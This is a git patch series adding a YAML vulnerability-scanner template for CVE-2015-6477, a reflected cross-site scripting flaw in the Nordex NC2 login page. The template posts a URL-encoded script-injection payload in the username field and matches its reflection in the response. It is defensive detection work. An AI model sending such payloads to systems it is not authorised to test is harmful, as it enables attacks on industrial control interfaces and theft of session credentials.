From 6874823632f6fa8a65bd1852894e7e5e66f8edbf Mon Sep 17 00:00:00 2001
From: Geeknik Labs <466878+geeknik@users.noreply.github.com>
Date: Tue, 6 Jul 2021 19:47:44 +0000
Subject: [PATCH 1/2] Create CVE-2015-6477.yaml

---
 cves/2015/CVE-2015-6477.yaml | 28 ++++++++++++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 cves/2015/CVE-2015-6477.yaml

diff --git a/cves/2015/CVE-2015-6477.yaml b/cves/2015/CVE-2015-6477.yaml
new file mode 100644
index 0000000000..aefe7d8fd9
--- /dev/null
+++ b/cves/2015/CVE-2015-6477.yaml
@@ -0,0 +1,28 @@
+id: CVE-2015-6477
+
+info:
+  name: Nordex NC2 'username' Parameter XSS
+  description: An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  reference:
+    - https://seclists.org/fulldisclosure/2015/Dec/117
+    - https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01
+  author: geeknik
+  severity: medium
+  tags: cve,cve2015,xss,iot,nordex,nc2
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/login"
+    body: 'connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27{{randstr}}%27%29%3C%2Fscript%3E&pw=nordex&language=en'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "text/html"
+      - type: word
+        part: body
+        words:
+          - "</script><script>alert('{{randstr}}')</script>"

From 6963c0d66922dc81ed7eb2d8d17f9480c9ab96e7 Mon Sep 17 00:00:00 2001
From: Sandeep Singh <sandeep@projectdiscovery.io>
Date: Wed, 7 Jul 2021 18:37:21 +0530
Subject: [PATCH 2/2] Update CVE-2015-6477.yaml

---
 cves/2015/CVE-2015-6477.yaml | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/cves/2015/CVE-2015-6477.yaml b/cves/2015/CVE-2015-6477.yaml
index aefe7d8fd9..22bd0f786b 100644
--- a/cves/2015/CVE-2015-6477.yaml
+++ b/cves/2015/CVE-2015-6477.yaml
@@ -6,6 +6,8 @@ info:
   reference:
     - https://seclists.org/fulldisclosure/2015/Dec/117
     - https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-6477
+
   author: geeknik
   severity: medium
   tags: cve,cve2015,xss,iot,nordex,nc2
@@ -22,6 +24,7 @@ requests:
         part: header
         words:
           - "text/html"
+
       - type: word
         part: body
         words: